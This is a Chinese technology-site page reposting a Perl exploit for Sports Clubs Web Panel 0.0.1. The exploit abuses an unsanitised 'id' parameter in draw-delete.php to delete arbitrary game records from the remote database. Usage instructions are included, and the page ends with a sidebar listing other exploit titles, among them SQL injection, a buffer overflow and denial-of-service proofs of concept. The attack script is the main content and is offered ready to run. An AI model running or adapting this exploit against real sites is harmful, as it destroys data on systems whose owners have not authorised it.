首页
网页制作
网络编程
脚本专栏
数据库
网站运营
网络安全
平面设计
CMS教程
搜索
建站极客
网络安全
Exploit
正文
Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
所属分类:
网络安全
/
Exploit
阅读数: 143
收藏 0
赞 0
分享
#!/usr/bin/perl -W # Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
# File affected: include/draw-delete.php (id) # Vuln Code: # 06: $did = $_GET['id'];
# 08: mysql_query("DELETE FROM draw WHERE did='$did'"); # by ka0x <ka0x01 [at] gmail [dot] com>
# D.O.M Labs - Security Researchers
# - www.domlabs.org -
# # ka0x@domlabs:~/codes$ ./sportspanel.pl http://localhost/sportspanel 3
use LWP::UserAgent; my $host = $ARGV[0];
my $did = $ARGV[1]; die &_USAGE unless $ARGV[1]; sub _USAGE
{
die "
- Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit -
- by ka0x (www.domlabs.org) usage: ./$0 <host> <valid_game_id>
ex: ./$0 http://localhost/sportspanel 2
";
} my $ua = LWP::UserAgent->new() or die;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); my $req = HTTP::Request->new(GET => $host."/?p=draw-delete&id=".$did);
my $res = $ua->request($req);
my $con = $res->content; if ($res->is_success){
if($con =~ /$did/){
print "[ ] The Game \"$did\" has been deleted from the database!\n";
}
} else{
print "[-] Exploit Failed!";
} __END__
更多精彩内容
其他人还在看
Maian Events 2.0 Insecure Cookie Handling Vulnerability
Author: Saime Date: July 12, 2008 Script: Maian Events v2.0 Insecure Cookie Handling Vulnerability URL: http://www.maianscriptworld
评论 0
收藏 0
赞 0
分享
Maian Gallery 2.0 Insecure Cookie Handling Vulnerability
Author: Saime Date: July 12, 2008 Script: Maian Gallery v2.0 Insecure Cookie Handling Vulnerability URL: http://www.maianscriptworl
评论 0
收藏 0
赞 0
分享
Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
################################################################# # # Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
评论 0
收藏 0
赞 0
分享
Maian Cart 1.1 Insecure Cookie Handling Vulnerability
Author: Saime Date: July 12, 2008 Script: Maian Cart v1.1 Insecure Cookie Handling Vulnerability URL: http://www.maianscriptworld.c
评论 0
收藏 0
赞 0
分享
Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
#!/usr/bin/perl # # http://www.securityfocus.com/bid/11775 # credit to Muts for this vulnerability # acaro [at] jervus.it
评论 0
收藏 0
赞 0
分享
phsBlog 0.2 Bypass SQL Injection Filtering Exploit
#!/usr/bin/perl #---------------------------------------------------------------- # #Script : PhsBlog v0.2 # #Type : Bypass S
评论 0
收藏 0
赞 0
分享
Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit
#!/usr/bin/perl #---------------------------------------------------------------- # #Script : Ezphotogallery 2.1 # #Type : Mu
评论 0
收藏 0
赞 0
分享
Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
<!-- Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC Summary: Maxthon Browser is a powerful tabbed browser built
评论 0
收藏 0
赞 0
分享
minb 0.1.0 Remote Code Execution Exploit
#!/usr/bin/python ##################################################################################### #### minb
评论 0
收藏 0
赞 0
分享
Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com) Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista I
评论 0
收藏 0
赞 0
分享
查看更多
网络赚钱
更多
朋友圈疯传的万能Wi-Fi账号是假的 犯了常识性错误
漂洋过海坑死你 海淘代购名为国际大牌实为国产的山寨货
90后男屌丝如何让淘宝客日赚10万滴
怎么才能做好移动互联网营销?
怎么进入微店买东西?微店购物流程图文介绍
教育培训类网站的盈利模式
站长故事
更多
分享我经营网站的方法心得,希望大家能学到知识
我认识的中国第一网民高春辉
我认识的互联网活化石金山劳模雷军
浅谈网站站长之现状
大学生谈网络赚钱的经历
浅析将两个月的新站做到权重4的方案